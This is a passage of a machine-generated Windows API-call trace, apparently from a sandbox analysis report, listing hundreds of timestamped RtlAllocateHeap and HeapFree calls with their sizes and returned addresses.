out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x109028 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b90 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ab8 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105f10 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ab8 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0035.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b90 | out: hHeap=0xe0000) returned 1 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0035.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1079e0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107440 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106bd0 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106c60 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107320 [0035.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107710 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1079e0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107440 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106bd0 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106c60 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107320 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107710 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0035.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0035.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0035.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x108ce0 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b48 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052d0 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ce0 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052d0 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x1061e0 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ce0 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, 